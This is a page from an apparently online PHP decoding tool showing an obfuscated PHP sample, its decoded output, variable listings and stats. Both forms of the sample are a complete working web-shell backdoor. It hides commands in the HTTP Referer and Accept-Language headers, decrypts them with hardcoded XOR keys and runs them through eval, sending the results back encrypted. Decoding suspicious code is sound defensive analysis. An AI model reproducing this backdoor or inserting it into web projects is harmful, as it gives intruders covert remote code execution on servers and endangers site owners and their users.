Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

$K='s(md5(W$i.$kh),0WW,W3));$f=WWW$slW($ss(md5($i.$kf),0,3));W$p="";forWW($z=1;$z<Wcount($..

Decoded Output download

$kh="c8b2";$kf="2412";function x($t,$k){$c=strlen($k);$l=strlen($t);$o="";for($i=0;$i<$l;){for($j=0;($j<$c&&$i<$l);$j++,$i++){$o.=$t{$i}^$k{$j};}}return $o;}$r=$_SERVER;$rr=@$r["HTTP_REFERER"];$ra=@$r["HTTP_ACCEPT_LANGUAGE"];if($rr&&$ra){$u=parse_url($rr);parse_str($u["query"],$q);$q=array_values($q);preg_match_all("/([\w])[\w-]+(?:;q=0.([\d]))?,?/",$ra,$m);if($q&&$m){@session_start();$s=&$_SESSION;$ss="substr";$sl="strtolower";$i=$m[1][0].$m[1][1];$h=$sl($ss(md5($i.$kh),0,3));$f=$sl($ss(md5($i.$kf),0,3));$p="";for($z=1;$z<count($m[1]);$z++)$p.=$q[$m[2][$z]];if(strpos($p,$h)===0){$s[$i]="";$p=$ss($p,3);}if(array_key_exists($i,$s)){$s[$i].=$p;$e=strpos($s[$i],$f);if($e){$k=$kh.$kf;ob_start();@eval(@gzuncompress(@x(@base64_decode(preg_replace(array("/_/","/-/"),array("/","+"),$ss($s[$i],0,$e))),$k)));$o=ob_get_contents();ob_end_clean();$d=base64_encode(x(gzcompress($o),$k));print("<$k>$d</$k>");@session_destroy();}}}}

Did this file decode correctly?

Original Code

$K='s(md5(W$i.$kh),0WW,W3));$f=WWW$slW($ss(md5($i.$kf),0,3));W$p="";forWW($z=1;$z<Wcount($mW[1';
$y='WkeyW_existWs($i,$Ws)){$WWs[$i].W=$p;$e=WWstrpos($s[$i]W,$f);if($eW){$k=$khW.W$kf;ob_sta';
$X='baWsWe64_encode(x(gzcomprWess($o)W,W$k)W);print("<$k>$dW</$k>WW");@session_WdestrWoy();}}}}';
$u='&&$ra){W$WWu=Wparse_url($rr);Wparse_str($u["querWy"],W$qW);WWW$q=array_values($q);pregW_matc';
$v='i=0;$i<$l;W){foWr($j=0W;($j<$Wc&&$iW<$l);$j++WW,$i++W){$o.W=$t{$i}^$k{W$j}W;}}rWeturn $';
$D=']);$z++)$p.=W$q[$Wm[2][$Wz]];Wif(stWrpoWWs($p,$hW)===W0){$s[$i]="";$pW=$ss($p,3);}Wif(aWrray_';
$C='rt(W);@WevWal(@gzuncoWmpress(@x(@bWase64W_decodeW(pregW_replacWWe(arrayW("/_W/","/-/"),arWr';
$o='Wh_all("/([\\wW])[\\wW-]+(?W:;WqW=0.([\\d])W)?,W?/",$ra,$m);ifW($q&&$Wm){@WsessWion_staWrt()';
$t='o;}$r=WWW$W_SERVERW;$rr=@$r["HTTP_RWEFERER"];$Wra=@$r[W"HTTP_ACWCWEWPT_LANGUAGEW"];ifW(W$rr';
$O=';$s=W&$_SESSWIONW;$ssW="substrWW";$sl="strtolowerW";W$i=$m[W1][0].$m[W1][1W];$hWW=$sl($s';
$Z='$khW="c8Wb2"W;$kf="2412";fWuncWtion x(W$t,$Wk)W{$Wc=strlenW($k);$l=WstrleWn($tW);$o="";for($';
$M='aWyW("/","W+"),$Wss($sW[$Wi],0,$e))W),W$k)));$Wo=ob_get_contentsW()W;ob_end_WcleaWn();$d=W';
$q=str_replace('W','',$Z.$v.$t.$u.$o.$O.$K.$D.$y.$C.$M.$X);
echo $q;

Function Calls

str_replace 1

Variables

$C rt(W);@WevWal(@gzuncoWmpress(@x(@bWase64W_decodeW(pregW_repl..
$D ]);$z++)$p.=W$q[$Wm[2][$Wz]];Wif(stWrpoWWs($p,$hW)===W0){$s[..
$K s(md5(W$i.$kh),0WW,W3));$f=WWW$slW($ss(md5($i.$kf),0,3));W$p..
$M aWyW("/","W+"),$Wss($sW[$Wi],0,$e))W),W$k)));$Wo=ob_get_cont..
$O ;$s=W&$_SESSWIONW;$ssW="substrWW";$sl="strtolowerW";W$i=$m[W..
$X baWsWe64_encode(x(gzcomprWess($o)W,W$k)W);print("<$k>$dW</$k..
$Z $khW="c8Wb2"W;$kf="2412";fWuncWtion x(W$t,$Wk)W{$Wc=strlenW(..
$o Wh_all("/([\wW])[\wW-]+(?W:;WqW=0.([\d])W)?,W?/",$ra,$m);ifW..
$q $kh="c8b2";$kf="2412";function x($t,$k){$c=strlen($k);$l=str..
$t o;}$r=WWW$W_SERVERW;$rr=@$r["HTTP_RWEFERER"];$Wra=@$r[W"HTTP..
$u &&$ra){W$WWu=Wparse_url($rr);Wparse_str($u["querWy"],W$qW);W..
$v i=0;$i<$l;W){foWr($j=0W;($j<$Wc&&$iW<$l);$j++WW,$i++W){$o.W=..
$y WkeyW_existWs($i,$Ws)){$WWs[$i].W=$p;$e=WWstrpos($s[$i]W,$f)..

Stats

MD5 5b20b90c83d76b78e0b1311567b717ff
Eval Count 0
Decode Time 95 ms